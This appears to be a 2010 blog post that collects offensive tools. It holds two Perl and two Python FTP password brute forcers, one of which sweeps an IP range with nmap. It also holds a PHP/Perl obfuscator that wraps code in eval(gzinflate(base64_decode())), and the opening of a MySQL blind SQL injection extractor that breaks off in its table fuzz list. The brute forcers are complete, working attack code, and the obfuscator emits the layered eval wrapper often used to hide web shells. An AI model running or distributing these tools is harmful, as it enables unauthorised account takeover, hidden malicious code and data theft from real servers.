Thursday, November 25, 2010

FTP brute forcer (Perl, single host). Two variants follow: the second swaps the loop order so each password is tried against every user before moving on, and prints nothing on exit.

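#!/usr/bin/perl
# ftp brute forcer (single host).
#
# Tries every username/password pair -- given on the command line or read from
# list files -- against one FTP server.  The first pair that logs in is written
# to result.txt and the script exits.  Only run this against systems you are
# authorised to test.

use strict;
use warnings;

use Getopt::Std;

use Net::FTP;

# Option variables filled in by getopts(); they are package globals by design.
our ($opt_h, $opt_u, $opt_U, $opt_p, $opt_P);

# getopts() understands the "x:" (switch takes a value) syntax and fails on an
# unknown switch; the original getopt() call treated the ':' characters as
# switches of their own.
getopts('h:u:U:p:P:') or usage();

if ((!$opt_h) || ((!$opt_u) && (!$opt_U)) || ((!$opt_p) && (!$opt_P))) { usage(); exit; }

# Start with an empty result.txt unless the FTP_CRACK marker file exists --
# presumably a way to keep results from an earlier run (TODO confirm intent).
if (! -e "FTP_CRACK") {
    open(my $logfile, '>', 'result.txt') or die "Cannot Open Log File: $!";
    close $logfile or die "Cannot close result.txt: $!";
}

# Shared with connect()/do_it()/success() below, so they stay file-scoped.
my $HOST = $opt_h;
my $USER;
my $PASS;
my @USERNAMES;
my @PASSWORDS;
my $ftp;

# Returns the single value when one was given, otherwise every line of the
# list file.  Three-argument open: the original two-argument form let a file
# name such as "| cmd" or ">file" act as a pipe or redirection, and the
# "<FH>" read had been lost from the listing altogether.
sub read_list {
    my ($single, $list_file) = @_;
    if (defined $single && length $single) {
        chomp $single;
        return ($single);
    }
    open(my $fh, '<', $list_file) or die "\a\nError Unable To Open $list_file.\n $!";
    my @lines = <$fh>;
    close $fh;
    return @lines;
}

@USERNAMES = read_list($opt_u, $opt_U);
@PASSWORDS = read_list($opt_p, $opt_P);

# Every user against every password; success() exits on the first valid pair.
foreach my $U (@USERNAMES) {
    chomp $U;
    $USER = $U;
    foreach my $P (@PASSWORDS) {
        chomp $P;
        $PASS = $P;
        # The '&' is required here: a plain connect() call would resolve to
        # Perl's socket builtin, not the sub defined below.
        &connect();
        do_it();
    }
}

quit();
exit;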

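# Opens a new control connection to $HOST into the shared $ftp handle.
# The original retried forever in a tight loop when the host was down; this
# gives up after a few attempts, pausing between them.
sub connect {
    my $max_tries = 5;
    undef($ftp);
    for my $try (1 .. $max_tries) {
        $ftp = Net::FTP->new($HOST);
        last if $ftp;
        warn "\n\nSorry Cant Connect To $HOST\n$@";   # Net::FTP reports the reason in $@
        sleep 1 if $try < $max_tries;
    }
    die "Giving up on $HOST after $max_tries failed connection attempts\n" unless $ftp;
    return;
}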

# Attempts one login with the current $USER/$PASS on the open $ftp handle,
# hands a valid pair to success() (which exits), then closes the session.
sub do_it {
    if ($ftp->login($USER, $PASS)) {
        success();
    }
    $ftp->quit;
}

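# Records the working pair in result.txt and stops the run.  Opens in append
# mode so earlier hits are kept, as usage() promises (the original used '>'
# and overwrote the file on every success).
sub success {
    open(my $logfile, '>>', 'result.txt') or die "Cannot Open Log File: $!";
    print {$logfile} "\nUsername : $USER has Password : $PASS on $HOST.\n\n\n\n\n";
    close $logfile or die "Cannot close result.txt: $!";
    quit();
}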

# Prints the command-line help and exits.
sub usage {
    my @help = (
        "Usage:$0 -h HOST [-u USERNAME || -U USERLIST] [-p PASSWORD || -P PASSLIST]",
        "",
        "-h = Hostname Of FTP Server.",
        "-u = Single Username To crack.",
        "-U = List Of Usernames To crack.",
        "-p = Single Password To use.",
        "-P = List Of Passwords To use.",
        "Cracked Accounts are appended To result.txt .",
    );
    print join("\n", @help), "\n\n";
    exit;
}

# Prints the sign-off banner and terminates the script.
sub quit {
    print STDOUT "\n\nI'M DONE ......\n\n";
    exit 0;
}

------------------------------------------------
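#!/usr/bin/perl
# ftp brute forcer (single host), password-major variant.
#
# Tries every username/password pair -- given on the command line or read from
# list files -- against one FTP server.  Unlike the first variant, the outer
# loop is over passwords, so each password is tried against every user before
# the next password is used.  The first pair that logs in is written to
# result.txt and the script exits.  Only run this against systems you are
# authorised to test.

use strict;
use warnings;

use Getopt::Std;

use Net::FTP;

# Option variables filled in by getopts(); they are package globals by design.
our ($opt_h, $opt_u, $opt_U, $opt_p, $opt_P);

# getopts() understands the "x:" (switch takes a value) syntax and fails on an
# unknown switch; the original getopt() call treated the ':' characters as
# switches of their own.
getopts('h:u:U:p:P:') or usage();

if ((!$opt_h) || ((!$opt_u) && (!$opt_U)) || ((!$opt_p) && (!$opt_P))) { usage(); exit; }

# Start with an empty result.txt unless the FTP_CRACK marker file exists --
# presumably a way to keep results from an earlier run (TODO confirm intent).
if (! -e "FTP_CRACK") {
    open(my $logfile, '>', 'result.txt') or die "Cannot Open Log File: $!";
    close $logfile or die "Cannot close result.txt: $!";
}

# Shared with connect()/do_it()/success() below, so they stay file-scoped.
my $HOST = $opt_h;
my $USER;
my $PASS;
my @USERNAMES;
my @PASSWORDS;
my $ftp;

# Returns the single value when one was given, otherwise every line of the
# list file.  Three-argument open: the original two-argument form let a file
# name such as "| cmd" or ">file" act as a pipe or redirection, and the
# "<FH>" read had been lost from the listing altogether.
sub read_list {
    my ($single, $list_file) = @_;
    if (defined $single && length $single) {
        chomp $single;
        return ($single);
    }
    open(my $fh, '<', $list_file) or die "\a\nError Unable To Open $list_file.\n $!";
    my @lines = <$fh>;
    close $fh;
    return @lines;
}

@USERNAMES = read_list($opt_u, $opt_U);
@PASSWORDS = read_list($opt_p, $opt_P);

# Every password against every user; success() exits on the first valid pair.
foreach my $P (@PASSWORDS) {
    chomp $P;
    $PASS = $P;
    foreach my $U (@USERNAMES) {
        chomp $U;
        $USER = $U;
        # The '&' is required here: a plain connect() call would resolve to
        # Perl's socket builtin, not the sub defined below.
        &connect();
        do_it();
    }
}

quit();
exit;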

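# Opens a new control connection to $HOST into the shared $ftp handle.
# The original retried forever in a tight loop when the host was down; this
# gives up after a few attempts, pausing between them.
sub connect {
    my $max_tries = 5;
    undef($ftp);
    for my $try (1 .. $max_tries) {
        $ftp = Net::FTP->new($HOST);
        last if $ftp;
        warn "\n\nSorry Cant Connect To $HOST\n$@";   # Net::FTP reports the reason in $@
        sleep 1 if $try < $max_tries;
    }
    die "Giving up on $HOST after $max_tries failed connection attempts\n" unless $ftp;
    return;
}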

# Attempts one login with the current $USER/$PASS on the open $ftp handle,
# hands a valid pair to success() (which exits), then closes the session.
sub do_it {
    if ($ftp->login($USER, $PASS)) {
        success();
    }
    $ftp->quit;
}

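# Records the working pair in result.txt and stops the run.  Opens in append
# mode so earlier hits are kept, as usage() promises (the original used '>'
# and overwrote the file on every success).
sub success {
    open(my $logfile, '>>', 'result.txt') or die "Cannot Open Log File: $!";
    print {$logfile} "\nUsername : $USER has Password : $PASS on $HOST.\n\n\n\n\n";
    close $logfile or die "Cannot close result.txt: $!";
    quit();
}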

# Prints the command-line help and exits.
sub usage {
    my @help = (
        "Usage:$0 -h HOST [-u USERNAME || -U USERLIST] [-p PASSWORD || -P PASSLIST]",
        "",
        "-h = Hostname Of FTP Server.",
        "-u = Single Username To crack.",
        "-U = List Of Usernames To crack.",
        "-p = Single Password To use.",
        "-P = List Of Passwords To use.",
        "Cracked Accounts are appended To result.txt .",
    );
    print join("\n", @help), "\n\n";
    exit;
}

# Terminates the script; this variant prints nothing on the way out.
sub quit {
    exit 0;
}

FTP brute forcer over an IP range (Python; shells out to nmap to find hosts with port 21 open, then tries every user/word pair against each)

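#!/usr/bin/python
#Ftp Brute Forcer, searches ip_range for hosts using ftp.
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
#
# Usage: ./ftpbrute.py <ip_range> <userlist> <wordlist>
# (the original shebang lacked the leading '/', so it could not be run directly)

import threading, time, StringIO, commands, random, sys, ftplib, re
from ftplib import FTP
from copy import copy

if len(sys.argv) !=4:
    print "Usage: ./ftpbrute.py <ip_range> <userlist> <wordlist>"
    sys.exit(1)

def _read_lines(path, what):
    """Return the lines of `path`, or exit with a message if it cannot be read.

    `what` names the list in the error message ("userlist" / "wordlist").
    The original left the file object open; the with-block closes it.
    """
    try:
        with open(path, "r") as fh:
            return fh.readlines()
    except(IOError):
        print "Error: Check your %s path\n" % what
        sys.exit(1)

users = _read_lines(sys.argv[2], "userlist")   # one username per line, newline kept
words = _read_lines(sys.argv[3], "wordlist")   # one password per line, consumed by getword()

print "\n\t   d3hydr8[at]gmail[dot]com ftpBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Scanning:",sys.argv[1]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)

# master copy of the wordlist; reloader() refills `words` from it
wordlist = copy(words)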

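def scan():
    """Return the IPv4 addresses in sys.argv[1] that nmap reports with port 21 open.

    nmap is run without a shell (list-form subprocess), so the user-supplied
    range can no longer inject commands; the original interpolated it into a
    shell pipeline ("nmap -P0 <range> -p 21 | grep open -B 3").  The grep -B 3
    step is reproduced here: for every line containing "open", the first IPv4
    address found on that line or the three lines before it is taken.
    Returns [] if nmap cannot be started.
    """
    import subprocess

    iprange = sys.argv[1]
    try:
        proc = subprocess.Popen(["nmap", "-P0", iprange, "-p", "21"],
                                stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        out = proc.communicate()[0]
    except OSError:
        print "Error: could not run nmap"
        return []

    # tighter than the original "\d*\.\d*\.\d*\.\d*", which also matched "..."
    ip_re = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")
    lines = out.splitlines()
    ip_list = []
    for idx, line in enumerate(lines):
        if "open" not in line:
            continue
        for ctx in lines[max(0, idx - 3):idx + 1]:
            found = ip_re.findall(ctx)
            if found:
                if found[0] not in ip_list:
                    ip_list.append(found[0])
                break
    return ip_list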

def reloader():
    """Top up the shared `words` queue with every entry of the master `wordlist`."""
    words.extend(wordlist)

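# One lock shared by every worker thread.  The original created a fresh
# Lock() inside getword(), which nobody else could contend for, so the
# list manipulation below was never actually serialised.
_words_lock = threading.Lock()

def getword():
    """Take a random password out of the shared `words` list and return it
    without its line terminator.

    When `words` is empty it is refilled from the master list via reloader().
    Raises ValueError if the wordlist itself is empty.
    """
    with _words_lock:
        if len(words) == 0:
            reloader()
        value = random.sample(words, 1)[0]
        # the original only removed the word on the non-refill path, so the
        # first word after a refill could be served twice
        words.remove(value)
    # the original's [:-1] also dropped the last character of an unterminated
    # final line
    return value.rstrip("\r\n")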
       
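class Workhorse(threading.Thread):
    """One login attempt in its own thread.

    Draws a password with getword() and tries it for the username in the
    module global `user` against the host in the module global `ip` (both set
    by the scanning loop at the bottom of the script).  On success the pair is
    printed and the whole process exits with status 2; any ftplib error means
    the attempt simply failed.
    """

    def run(self):
        import os
        value = getword()
        # rstrip instead of [:-1]: the last line of the user list may have no
        # newline, and [:-1] would then cut the final character of the name
        name = user.rstrip("\r\n")
        ftp = None
        try:
            print "-"*12
            print "User:",name,"Password:",value
            ftp = FTP(ip)
            ftp.login(name, value)
            ftp.retrlines('LIST')
            print "\t\nLogin successful:",name, value
            ftp.quit()
            ftp = None
            # The original called work.join() here -- a thread cannot join
            # itself (RuntimeError) -- and then sys.exit(2), which only raises
            # SystemExit inside this worker thread.  os._exit() really ends
            # the process; flush first because it skips the normal cleanup.
            sys.stdout.flush()
            os._exit(2)
        except (ftplib.all_errors), msg:
            #print "An error occurred:", msg
            pass
        finally:
            # close the control socket of a failed attempt instead of leaving
            # it to the garbage collector
            if ftp is not None:
                try:
                    ftp.close()
                except Exception:
                    pass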

# --- main loop -----------------------------------------------------------
# ip_list: every address nmap reported with port 21 open (see scan()).
ip_list = scan()
print "[+] Hosts Loaded:",len(ip_list),"\n"
for ip in ip_list:
    print "\n\tAttempting BruteForce:",ip,"\n"
    # Banner grab.  NOTE(review): this connection is never quit()/close()d,
    # so it stays open until the object is garbage-collected.
    try:
        f = FTP(ip)
        print "[+] Response:",f.getwelcome()
    except (ftplib.all_errors):
        pass
    # Anonymous-login check.  A hit is only printed, not recorded anywhere,
    # and the per-user brute force below still runs afterwards.
    try:
        print "\n[+] Checking for anonymous login\n"
        ftp = FTP(ip)
        ftp.login()
        ftp.retrlines('LIST')
        print "\t\nAnonymous login successful!!!\n"
        ftp.quit()
    except (ftplib.all_errors):
        print "\tAnonymous login unsuccessful\n"
    # One Workhorse thread per word, started one second apart.  Workhorse.run()
    # reads `user` and `ip` as module globals, so they must not change until
    # the thread has picked them up.
    for user in users:
        # range(len(words)) is evaluated once, on entry; reloader() then tops
        # `words` up with the full master list (first iteration only) and each
        # getword() call removes one entry.
        for i in range(len(words)):
            if i == 0: reloader()
            work = Workhorse()
            work.start()
            time.sleep(1)

FTP brute forcer (Python, single target and single user, wordlist-driven; logs every attempt to ftpbrute.log)

#!/usr/bin/python
################################################################
#       .___             __          _______       .___        #
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    #
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   #
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   #
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   #
#        \/                  \/             \/                 #
#                   ___________   ______  _  __                #
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                #
#                 \  \___|  | \/\  ___/\     /                 #
#                  \___  >__|    \___  >\/\_/                  #
#      est.2007        \/            \/   forum.darkc0de.com   #
################################################################
# This is ftp brute force tools .
# This was written for educational purpose and pentest only. Use it at your own risk.
# Suggestion ! don't use very large wordlist, because system need to read it first for a while and do it @ brute time... "that's cause LOSS" maybe you can use time.sleep(int)
# VISIT : http://www.devilzc0de.com
# CODING BY : gunslinger_
# EMAIL : gunslinger.devilzc0de@gmail.com
# TOOL NAME : ftpbrute.py v1.0
# Big thanks darkc0de member : d3hydr8, Kopele, icedzomby, VMw4r3 and all member
# Special thanks to devilzc0de crew : mywisdom, petimati, peneter, flyff666, rotlez, 7460, xtr0nic, devil_nongkrong, cruzen and all devilzc0de family
# Greetz : all member of jasakom.com, jatimcrew.com
# Special i made for jasakom member and devilzc0de family
# Please remember... your action will be logged in target system...
# Author will not be responsible for any damage !!
# Use it with your own risk

import sys
import time
import os
from ftplib import FTP

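# Terminal-clear command for this platform.  Python 3.3+ reports sys.platform
# as 'linux' rather than 'linux2', so match on the prefix (this also covers
# the old 'linux-i386' value).
if sys.platform.startswith('linux') or sys.platform == 'darwin':
    SysCls = 'clear'
elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
    SysCls = 'cls'
else:
    SysCls = 'unknown'

log = "ftpbrute.log"

# Append-mode log shared by every function below; closed at the end of the
# script.  (The name shadows the builtin `file`, but every caller uses it.)
file = open(log, "a")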
def MyFace() :
    """Clear the screen and print the ASCII-art banner, writing the same
    banner to the shared log file.

    Uses the module globals SysCls (clear command) and file (open log).
    """
    os.system(SysCls)
    print "\n            .___             .__ .__                  _______       .___                                                       "
    print "          __| _/ ____ ___  __|__||  |  ________  ____ \   _  \    __| _/ ____     ____ _______   ____ __  _  __                "
    print "         / __ |_/ __ \\\  \/ /|  ||  |  \___   /_/ ___\/  /_\  \  / __ |_/ __ \  _/ ___\\\_  __ \_/ __ \\\ \/ \/ /            "
    print "        / /_/ |\  ___/ \   / |  ||  |__ /    / \  \___\  \_/   \/ /_/ |\  ___/  \  \___ |  | \/\  ___/ \     /                 "
    print "        \____ | \___  > \_/  |__||____//_____ \ \___  >\_____  /\____ | \___  >  \___  >|__|    \___  > \/\_/                  "
    print "             \/     \/                       \/     \/       \/      \/     \/       \/             \/                         "
    print "                                                http://www.devilzc0de.com            "
    print "                                                by : gunslinger_                "
    print " ftpbrute.py version 1.0                                                                             "
    print " Brute forcing ftp target                                                             "
    print " Programmmer : gunslinger_                                                                            "
    print " gunslinger[at]devilzc0de[dot]com                                                                     "
    print "_______________________________________________________________________________________________________________________________________\n"
    # same banner into the log; each write carries its own leading newline
    file.write("\n            .___             .__ .__                  _______       .___                                                       ")
    file.write("\n          __| _/ ____ ___  __|__||  |  ________  ____ \   _  \    __| _/ ____     ____ _______   ____ __  _  __                ")
    file.write("\n         / __ |_/ __ \\\  \/ /|  ||  |  \___   /_/ ___\/  /_\  \  / __ |_/ __ \  _/ ___\\\_  __ \_/ __ \\\ \/ \/ /            ")
    file.write("\n        / /_/ |\  ___/ \   / |  ||  |__ /    / \  \___\  \_/   \/ /_/ |\  ___/  \  \___ |  | \/\  ___/ \     /                 ")
    file.write("\n        \____ | \___  > \_/  |__||____//_____ \ \___  >\_____  /\____ | \___  >  \___  >|__|    \___  > \/\_/                  ")
    file.write("\n             \/     \/                       \/     \/       \/      \/     \/       \/             \/                         ")
    file.write("\n                                                http://www.devilzc0de.com            ")
    file.write("\n                                                by : gunslinger_                ")
    file.write("\n ftpbrute.py version 1.0                                                                             ")
    file.write("\n Brute forcing ftp target                                                             ")
    file.write("\n Programmmer : gunslinger_                                                                            ")
    file.write("\n gunslinger[at]devilzc0de[dot]com                                                                     ")
    file.write("\n_______________________________________________________________________________________________________________________________________\n")


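def HelpMe() :
    """Print the usage text to the screen and the log, then exit with status 1.

    The original did not compile: everything after the first print was
    indented deeper than the function body (IndentationError).
    """
    MyFace()
    print 'Usage: ./ftpbrute.py [options]\n'
    print 'Options: -t, --target    <hostname/ip>   |   Target to bruteforcing '
    print '         -u, --user      <user>          |   User for bruteforcing'
    print '         -w, --wordlist  <filename>      |   Wordlist used for bruteforcing'
    print '         -h, --help      <help>          |   print this help'
    print '                                                            \n'
    print 'Example: ./ftpbrute.py -t 192.168.1.1 -u root -w wordlist.txt        \n'
    file.write( '\nUsage: ./ftpbrute.py [options]')
    file.write( '\nOptions: -t, --target    <hostname/ip>   |   Target to bruteforcing ')
    file.write( '\n         -u, --user      <user>          |   User for bruteforcing')
    file.write( '\n         -w, --wordlist  <filename>      |   Wordlist used for bruteforcing')
    file.write( '\n         -h, --help      <help>          |   print this help')
    file.write( '\n     maybe you can use time.sleep(int)                                                        \n')
    file.write( '\nExample: ./ftpbrute.py -t 192.168.1.1 -u root -w wordlist.txt        \n')
    sys.exit(1)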

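# Command-line parsing.  Sets the module globals hostname, user and wordlist.
# Defaults are assigned first so a missing flag ends in HelpMe() rather than
# the NameError the original produced later on; a value flag given as the last
# argument is likewise reported instead of raising IndexError.
hostname = None
user = None
wordlist = None

_args = sys.argv[1:]
if len(_args) == 0:
    HelpMe()
_i = 0
while _i < len(_args):
    _flag = _args[_i].lower()
    if _flag == '-h' or _flag == '--help':
        HelpMe()
    elif _flag in ('-t', '--target', '-u', '--user', '-w', '--wordlist'):
        if _i + 1 >= len(_args):
            print "\n[-] Option %s needs a value\n" % _args[_i]
            HelpMe()
        _val = _args[_i + 1]
        if _flag in ('-t', '--target'):
            hostname = _val
        elif _flag in ('-u', '--user'):
            user = _val
        else:
            wordlist = _val
        _i += 2
        continue
    _i += 1

if hostname is None or user is None or wordlist is None:
    HelpMe()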
       

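def BruteForce(word) :
    """Try one password for the module global `user` on `hostname`.

    Every attempt is echoed to the screen and the log.  On success the pair is
    printed, logged and the script exits (status 1, as in the original); a
    failed login or connection error is silent and the function returns.
    Ctrl-C aborts the run.

    The original did not compile (the try/except lines were indented
    inconsistently) and leaked the control connection of every failed attempt.
    """
    print "[?]Trying :",word
    file.write("\n[?]Trying :"+word)
    ftp = None
    try:
        ftp = FTP(hostname)
        ftp.login(user, word)
        ftp.retrlines('list')
        ftp.quit()
        ftp = None
        print "\n\t[!] Login Success ! "
        print "\t[!] Username : ",user, ""
        print "\t[!] Password : ",word, ""
        print "\t[!] Hostname : ",hostname, ""
        print "\t[!] Log all has been saved to",log,"\n"
        file.write("\n\n\t[!] Login Success ! ")
        file.write("\n\t[!] Username : "+user )
        file.write("\n\t[!] Password : "+word )
        file.write("\n\t[!] Hostname : "+hostname)
        file.write("\n\t[!] Log all has been saved to "+log)
        sys.exit(1)
    except KeyboardInterrupt:
        print "\n[-] Aborting...\n"
        file.write("\n[-] Aborting...\n")
        sys.exit(1)
    except Exception, e:
        # wrong password, refused connection, timeout: move on to the next word
        pass
    finally:
        if ftp is not None:
            try:
                ftp.close()
            except Exception:
                pass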

def Action ():
    """Show the banner, then announce the start of the run on the screen and
    in the shared log file."""
    MyFace()

    def status_lines():
        # built at call time so the timestamp is taken when it is printed
        return ("[!] Starting attack at %s" % time.strftime("%X"),
                "[!] System Activated for brute forcing...",
                "[!] Please wait until brute forcing finish !\n")

    for line in status_lines():
        print line
    for line in status_lines():
        file.write("\n" + line)

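Action()


# Load the wordlist.  The original never closed the file and did not compile
# (the except clause mixed 4- and 6-space indentation).
try:
    with open(wordlist, "r") as wl:
        words = wl.readlines()
except(IOError):
    print "\n[-] Error: Check your wordlist path\n"
    file.write("\n[-] Error: Check your wordlist path\n")
    sys.exit(1)

print "\n[+] Loaded:",len(words),"words"
print "[+] Server:",hostname
print "[+] User:",user
print "[+] BruteForcing...\n"
for word in words:
    # strip CR as well as LF so a Windows-format wordlist does not try "pass\r"
    BruteForce(word.rstrip("\r\n"))

file.close()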

PHP/Perl code obfuscator (web form; wraps the source in base64 — plus gzdeflate for PHP — inside an eval())

<?
// PHP OBFUSCATOR
// (C)2003 Richard Fairthorne -- http://richard.fairthorne.is-a-geek.com
// --------------------------
// Permission is granted to disctibute this file UNMODIFIED from its original
// form. All other rights are reserved.

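/**
 * Break $string into chunks of $length characters, each followed by "\n".
 *
 * The original never initialised $newstring (an "undefined variable" notice
 * and a null return for empty input) and looped forever when $length <= 0,
 * because substr($string, 0) never shortens the string.
 *
 * @param string $string text to wrap (base64 output in this file)
 * @param int    $length characters per line; values < 1 are treated as 1
 * @return string the wrapped text, "" for empty input
 */
function splitByNewline($string, $length) {
    $newstring = '';
    if ($length < 1) {
        $length = 1;
    }
    while (strlen($string) > 0) {
        $newstring .= substr($string, 0, $length) . "\n";
        $string = substr($string, $length);
    }
    return $newstring;
}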

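echo "<big><b>Free Code Obfuscator (PHP, PERL)</b></big><br>By <a href='http://richard.fairthorne.is-a-geek.com'>Richard Fairthorne</a><hr>";

// Form fields.  The original used $b64_input/$b64_action without ever
// assigning them, i.e. it relied on register_globals, which is off by default
// since PHP 4.2 and gone since 5.4.  Read them from the POST body explicitly.
$b64_input  = isset($_POST['b64_input'])  ? $_POST['b64_input']  : '';
$b64_action = isset($_POST['b64_action']) ? $_POST['b64_action'] : '';

// Only undo magic_quotes escaping when it is actually in effect.  An
// unconditional stripslashes() corrupts backslashes in the submitted code
// ("\n" inside a string literal becomes "n").
if (function_exists('get_magic_quotes_gpc') && @get_magic_quotes_gpc()) {
    $b64_input = stripslashes($b64_input);
}

// Every mode below emits eval() over a base64 (for PHP also gzdeflate'd)
// payload.  As the page text itself says, this only deters casual reading:
// the payload decodes with one call, and the eval(gzinflate(base64_decode()))
// shape is one that many malware scanners flag.  Generated output is shown
// through htmlspecialchars() so it cannot break out of the <textarea>.
switch($b64_action) {
    case "perl_encode":
    $output=$b64_input;
    $output=base64_encode($output);
    $output=splitByNewline($output,40);
    $output="#!/usr/bin/perl\nuse MIME::Base64;\neval(decode_base64('\n$output'));";

    $ilength=strlen($b64_input);
    $olength=strlen($output);

    ?>
    <table border=0 width=100%><tr><td valign=top>
    <textarea rows=18 cols=60 name=done><?=htmlspecialchars($output);?></textarea>
    </td><td valign=top>
    <b>PERL code obfuscated!</b><br><br>

    Your PERL code has been obfuscated.
    <br><br>
    <font color=maroon>
    Obfuscation-Strength: Normal (Fast code execution)<br>
    Compatibility: 100% Code compatibility<br>
    Input Length: <?=$ilength;?><br>
    Output Length: <b><?=$olength;?></b><br>
    </font>
    <br>
    To use the code, simply cut and paste it in place of the old code. You may need to update the perl path.
    It is important to understand that code obfuscation can act as a deterrant, but is not a replacement
    for encryption.<br><br>

    <a href='?'>Click here</a> to obfuscate another page.
    </td></tr></table>
    <?
  break;
    case "php_encode":
    // one round: deflate the source (wrapped in ?> ... <? so it is emitted as
    // plain text by the eval'd code), base64 it, and wrap it in an eval()
    $output=$b64_input;
    $output=gzdeflate("?>".$output."<?",9);
    $output=base64_encode($output);
    $output=splitByNewline($output,40);
    $output="<? eval(gzinflate(base64_decode('\n$output'))); ?>";

    $ilength=strlen($b64_input);
    $olength=strlen($output);

    ?>
    <table border=0 width=100%><tr><td valign=top>
    <textarea rows=18 cols=60 name=done><?=htmlspecialchars($output);?></textarea>
    </td><td valign=top>
    <b>PHP code obfuscated!</b><br><br>

    Your PHP code has been obfuscated.
    <br><br>
    <font color=maroon>
    Obfuscation-Strength: Normal (Fast code execution)<br>
    Compatibility: Zlib Required. 100% Code compatibility<br>
    Input Length: <?=$ilength;?><br>
    Output Length: <b><?=$olength;?></b><br>
    </font>
    <br>
    To use the code, simply cut and paste it in place of the old code.
    It is important to understand that code obfuscation can act as a deterrant, but is not a replacement
    for encryption.<br><br>

    <a href='?'>Click here</a> to obfuscate another page.
    </td></tr></table>
    <?
  break;
    case "php_encode_hi":
    // ten nested rounds of the same wrapper, then a final one with the
    // payload split onto its own line; each round adds an eval() level
    $output=$b64_input;
    for ($b64_counter=0; $b64_counter<10; $b64_counter++) {
        $output=gzdeflate("?>".$output."<?",9);
        $output=base64_encode($output);
        $output="<? eval(gzinflate(base64_decode('$output'))); ?>";
    }
    $output=gzdeflate("?>".$output."<?",9);
    $output=base64_encode($output);
    $output="<? eval(gzinflate(base64_decode('\n$output'))); ?>";

    $ilength=strlen($b64_input);
    $olength=strlen($output);

    ?>

    <table border=0 width=100%><tr><td valign=top>
    <textarea rows=18 cols=60 name=done><?=htmlspecialchars($output);?></textarea>
    </td><td valign=top>
    <b>PHP code obfuscated!</b><br><br>

    Your PHP code has been obfuscated.
    <br><br>
    <font color=maroon>
    Obfuscation-Strength: Trecherous (Best Protection)<br>
    Compatibility: Zlib Required. 100% Code Compatibility.<br>
    Input Length: <?=$ilength;?><br>
    Output Length: <b><?=$olength;?></b><br>
    </font>
    <br>
    To use the code, simply cut and paste it in place of the old code.
    It is important to understand that code obfuscation can act as a deterrant, but is not a replacement
    for encryption.<br><br>

    <a href='?'>Click here</a> to obfuscate another page.
    </td></tr></table>
    <?
  break;
  // case "decode":
  //     $output=htmlentities(base64_decode($b64_input),ENT_QUOTES);
  // break;
  default:
    // no (or unknown) action: show the input form
    ?>
    <table border=0 width=100%><tr><td valign=top>
    <form method=post>
    <textarea  name=b64_input cols=60 rows=16></textarea><br>
    <SELECT name=b64_action>
    <OPTION value='php_encode'>PHP - Normal Strength - Compressed</OPTION>
    <OPTION value='php_encode_hi'>PHP - Trecherous Strength - Compressed</OPTION>
    <OPTION value='perl_encode'>PERL - Normal Strength</OPTION>
    </SELECT>
    <input type=submit name=submit value='obfuscate'>
    <!-- <input type=submit name=b64_action value=decode> -->
    </form>
    </td><td valign=top>
    <b>Free Code obfuscator</b><br><br>

    If you would like a quick way to hide your php code from prying eyes, try this PHP code obfuscator.<br><br>Copy an entire PHP page, into the obfuscator, and it will return a code that also works on any PHP server, but is not human readable.<br><br>

        With code 5k or bigger, you may notice that the obfuscated code is smaller than the original code. You can thank me later.
    </td></tr></table>
    <? 
  break;
}
?>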

MySQL 4.x/5.x blind SQL injection extractor (blindext.py v3.0: information_schema enumeration, data extraction, table/column fuzzing)

#!/usr/bin/python
# Features!
# 1.MySQL Blind Injection Data Extractor
# 2.MySQL Blind Information_schema Database Enumerator
# 3.MySQL Blind Table and Column Fuzzer

# Feel free to do whatever you want with this code!
# Share the c0de!

# Darkc0de Team
# www.darkc0de.com
# rsauron[at]gmail[dot]com

# Greetz to
# d3hydr8, P47r1ck, Tarsian, c0mr@d, reverenddigitalx
# and the rest of the Darkc0de members

# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# Intended for authorized Web Application Pen Testing!

# BE WARNED, THIS TOOL IS VERY LOUD..

# Change Log
# 2.9 - added info mode, bug fix in the GuessValue function
# 3.0 - added row option.. now you can tell the app where to begin - remember limit start at 0 not 1

#Fill in the tables you want tested here.
# Table names tried by --fuzz mode, one request per name.  NOTE(review): the
# list contains duplicates (e.g. "admin_user" appears twice), each of which
# costs an extra request against the target.
fuzz_tables = ["user","users","username","usernames","mysql.user","orders","order_items","member","members","admin","administrator","administrators","login","logins","logon","jos_users","jos_contact_details","userrights","account","superuser","control","usercontrol","author","autore","artikel","newsletter","tb_user","tb_users","tb_username","tb_usernames","tb_admin","tb_administrator","tb_member","tb_members","tb_login","perdorues","korisnici","webadmin","webadmins","webuser","webusers","webmaster","webmasters","customer","customers","sysuser","sysusers","sysadmin","sysadmins","memberlist","tbluser","tbl_user","tbl_users","a_admin","x_admin","m_admin","adminuser","admin_user","adm","userinfo","user_info","admin_userinfo","userlist","user_list","user_admin","order","user_login","admin_user","admin_login","login_user","login_users","login_admin","login_admins","sitelogin","site_login","sitelogins","site_logins","SiteLogin","Site_Login","User","Users","Admin","Admins","Login","Logins","adminrights","news","perdoruesit"]
#Fill in the columns you want tested here.
# Column names tried by --fuzz mode.  NOTE(review): also contains duplicates
# ("admin_user", "myusername", "adminid"/"admin_id" each appear more than once).
